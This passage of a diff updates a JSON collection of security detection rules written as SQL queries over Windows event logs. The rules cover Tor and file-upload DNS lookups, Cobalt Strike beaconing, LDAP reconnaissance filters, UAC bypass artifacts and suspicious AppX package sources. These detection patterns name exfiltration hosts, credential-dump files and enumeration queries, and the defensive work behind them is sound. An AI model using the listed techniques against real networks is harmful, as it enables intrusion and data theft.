'%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", - "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", - "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": 
"b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE 
'%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Suspicious File Drop by Exchange", - "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", + "id": "31d68132-4038-47c7-8f8e-635a39a7c174", + "status": "test", + "description": "Detects potential Active Directory enumeration via LDAP", + "author": "Adeem Mawani", "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" - ], - "falsepositives": [ - "Unknown" + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE 
'%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE 
'%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" ], - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" + "filename": "win_ldap_recon.yml" }, { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Deployment Of The AppX Package Was Blocked By The Policy", + "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "status": "experimental", + "description": "Detects an appx package deployment that was blocked by the local computer policy", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_appxdeployment_server_policy_block.yml" }, { - "title": "Suspicious 
Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "Deployment AppX Package Was Blocked By AppLocker", + "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "description": "Detects an appx package deployment that was blocked by AppLocker policy", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_appxdeployment_server_applocker_block.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 
'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" - ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" - }, - { - "title": "New Shim Database Created in the Default Directory", - "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "status": "test", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", - "author": "frack113", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE 
'%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_new_shim_database.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", - "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "title": "Uncommon AppX Package Locations", + "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" ], - "filename": 
"file_event_win_hktl_safetykatz.yml" + "filename": "win_appxdeployment_server_uncommon_package_locations.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "Suspicious AppX Package Installation Attempt", + "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate AppX packages not signed by MS used part of an enterprise" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - 
"author": "Bhabesh Raj", + "title": "Potential Malicious AppX Package Installation Attempts", + "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", + "status": "experimental", + "description": "Detects potential installation or installation attempts of known malicious appx packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_mal_appx_names.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM 
